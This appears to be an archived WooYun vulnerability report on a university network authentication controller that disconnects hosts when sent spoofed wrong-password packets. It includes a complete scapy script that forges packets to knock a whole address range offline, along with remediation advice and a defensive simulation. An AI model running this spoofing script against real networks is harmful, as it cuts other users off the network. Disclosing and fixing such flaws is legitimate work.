WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-10-03: Details reported to the vendor, awaiting the vendor's handling
2015-10-13: Vendor actively ignored the vulnerability; details opened to third-party security partners (绿盟科技 NSFOCUS, 唐朝安全巡航)
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to ordinary white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
The school's network architecture and egress controller (出校控制器) have a flaw that exposes hosts to a denial-of-service attack.
The handshake of the school's egress controller is shown in the figure below: first the host sends a request packet, then the server returns a key, then the host computes a digest from that key, and finally the server returns an authentication result. The school's two critical problems are: 1. the school's routers do not perform source-address validation; 2. as soon as the server receives a wrong username and password it disconnects the host. So A can forge the IP address of any host B and send a request to the server at **.**.**.**; although the forging machine A never receives the key the server returns, A can still send a wrong authentication digest, which directly causes host B to be disconnected. I tested this from my own machine and the method works. The Python script is in the attachment.
Python code
```python
import hashlib
import struct
import time
from scapy.all import IP, UDP, send

username = 'XXXXXXXXXX'      # redacted in the original report
password = 'XXXXXXXXXX'      # redacted in the original report
server = '**.**.**.**'       # egress controller address, redacted in the original report

print('IP Client Crack')
print('........................')
print('Sending Handshake Packet...')
addr = (server, 5300)        # handshake / authentication port (UDP)

# Template of the authentication (digest) packet as captured from a real client;
# bytes 33..62 are replaced with the 30-character digest computed below.
temple = bytearray([0x82, 0x23, 0x21, 0x00, 0x00, 0x00,
                    0x00, 0x00, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00,
                    0x00, 0x39, 0x67, 0x64, 0x74, 0x34, 0x33, 0x37,
                    0x34, 0x35, 0x77, 0x72, 0x77, 0x71, 0x72, 0x1e,
                    0x00, 0x00, 0x00, 0xFF, 0x74, 0x34, 0x33, 0x37,
                    0x35, 0x42, 0x38, 0x32, 0x35, 0x37, 0x44, 0x44,
                    0x31, 0x35, 0x30, 0x45, 0xFF, 0x44, 0x37, 0x36,
                    0x44, 0x31, 0x35, 0x46, 0x33, 0x35, 0x46, 0x30,
                    0x44, 0x11, 0x00, 0x00, 0x00, 0x31, 0x31, 0x3a,
                    0x32, 0x32, 0x3a, 0x33, 0x33, 0x3a, 0x34, 0x34,
                    0x3a, 0x35, 0x35, 0x3a, 0x36, 0x36, 0x2d, 0x1f,
                    0xd6, 0x03, 0xcc, 0xf2, 0x24, 0x00, 0x0a, 0x00,
                    0x00, 0x00, 0x71, 0x77, 0x65, 0x72, 0x74, 0x79,
                    0x75, 0x69, 0x6f, 0x70])


def send_handshake(dip):
    # Handshake request (type byte 0x1f), spoofed from dip: the router does not check
    # the source address, so the key reply goes to dip rather than to this machine.
    pack_send = bytearray(300)
    pack_send[0] = 0x82; pack_send[1] = 0x23; pack_send[2] = 0x1f
    userlen = len(username)
    pack_send[11] = userlen
    tail = bytearray([0x0b, 0x00, 0x00, 0x00, 0x21, 0x40, 0x23, 0x24, 0x25, 0x25, 0x5e,
                      0x26, 0x2a, 0x28, 0x29, 0x07, 0x00, 0x00, 0x00, 0x71, 0x77, 0x65,
                      0x72, 0x74, 0x79, 0x75, 0x39, 0x30, 0x00, 0x00, 0x01, 0x00, 0x00,
                      0x00, 0x06, 0x00, 0x00, 0x00, 0x41, 0x53, 0x44, 0x46, 0x47, 0x48])
    for i in range(userlen):
        pack_send[15 + i] = ord(username[i]) - 10   # username bytes are stored minus 10
    for i in range(44):
        pack_send[15 + userlen + i] = tail[i]
    fakepack = struct.pack('300B', *pack_send)
    print(fakepack)
    pkt1 = IP(src=dip, dst=server) / UDP(sport=12345, dport=5300) / fakepack
    send(pkt1)
    print('Receiving key packet...')
    # The key reply never reaches this machine, so a fixed guess is used; because the
    # server drops the host on any wrong digest, the guess does not need to be right.
    calckey = 2323
    src = (str(calckey) + password).encode('utf-8')
    md51 = hashlib.md5(src).hexdigest().upper()
    md52 = (md51[0:5] + username).encode('utf-8')
    md53 = hashlib.md5(md52).hexdigest().upper()[0:30]
    md53 = bytearray(md53.encode('utf-8'))
    pass_pack = bytearray(300)
    for i in range(len(temple)):
        pass_pack[i] = temple[i]
    for i in range(30):
        pass_pack[i + 33] = md53[i]
    fakepack2 = struct.pack('300B', *pass_pack)
    pkt2 = IP(src=dip, dst=server) / UDP(sport=12345, dport=5300) / fakepack2
    time.sleep(0.5)
    send(pkt2)
    print(dip + ' attack over')


if __name__ == "__main__":
    for i in range(0, 62):
        dip = '172.16.00.' + str(i)
        # dip = '**.**.**.**'
        send_handshake(dip)
```
The routers do not validate source addresses, so sending a wrong username and password on a host's behalf is enough to knock that host offline.
1. Add source-address validation on all routers (a lot of work).
2. Change the server policy: record an issued key only after authentication succeeds, and use it as the basis for validating later heartbeat packets; a plain wrong password must not disconnect the host (least work).
3. When the client returns the authentication digest, it must also carry the key from the 0x20 packet; if it does not match the key issued in the 0x20 packet, ignore the packet (requires a software update).
4. Use HTTPS web authentication for all egress authentication.
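As an added illustration of fixes 2 and 3 (this is constructed example code, not the report's script or the real controller; the controller model, credentials, addresses and random key generation are assumptions), a simulated server that binds the issued key to the handshake and never drops an existing session on a bad digest, beside the reported policy:

```python
import hashlib
import secrets

def auth_digest(key, username, password):
    # Digest exactly as the report's client script derives it:
    # MD5(key || password) -> first 5 hex chars || username -> MD5 -> first 30 hex chars
    md51 = hashlib.md5((str(key) + password).encode()).hexdigest().upper()
    return hashlib.md5((md51[:5] + username).encode()).hexdigest().upper()[:30]

class Controller:
    """Simulated egress controller (constructed, not the real product).
    hardened=False reproduces the reported policy; hardened=True applies fixes 2 and 3."""
    def __init__(self, credentials, hardened):
        self.credentials = credentials   # username -> password, constructed sample
        self.hardened = hardened
        self.pending = {}                # src ip -> (username, key) awaiting a digest
        self.online = {}                 # src ip -> (username, key) authenticated sessions

    def handshake(self, src_ip, username):
        key = secrets.randbelow(2**31)   # fresh key, sent back to src_ip (whoever that is)
        self.pending[src_ip] = (username, key)
        return key

    def authenticate(self, src_ip, username, key, digest):
        pending_user, issued_key = self.pending.pop(src_ip, (None, None))
        if self.hardened and (pending_user != username or key != issued_key):
            return "ignored: echoed key does not match the one issued"   # fix 3
        expected = auth_digest(issued_key, username, self.credentials.get(username, ""))
        if digest == expected:
            self.online[src_ip] = (username, issued_key)   # fix 2: key recorded only now
            return "ok: online"
        if not self.hardened:
            self.online.pop(src_ip, None)   # reported policy: bad credentials drop the host
            return "rejected: host disconnected"
        return "rejected: bad credentials, existing session untouched"   # fix 2

def simulate(hardened):
    """Constructed scenario: host B logs in, then A spoofs B's address as the report
    describes (handshake, then a digest computed from a guessed key)."""
    ctl = Controller({"stu001": "s3cret"}, hardened)
    b_ip = "172.16.0.7"                  # constructed address
    key = ctl.handshake(b_ip, "stu001")  # B really receives this key
    login = ctl.authenticate(b_ip, "stu001", key, auth_digest(key, "stu001", "s3cret"))
    ctl.handshake(b_ip, "stu001")        # spoofed by A; the key reply goes to B, not A
    guessed = 2323                       # A never saw the key; the report's script hardcodes this
    spoofed = ctl.authenticate(b_ip, "stu001", guessed, auth_digest(guessed, "stu001", "s3cret"))
    return {"login": login, "spoofed": spoofed, "victim_online": b_ip in ctl.online}
```

With hardened=True the spoofed digest is ignored and B stays online; with hardened=False the same packets disconnect B, which is the behaviour the report describes.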
Severity: No impact (vendor ignored)
Ignored at: 2016-01-11 15:32
Vulnerability Rank: 15 (WooYun rating)
None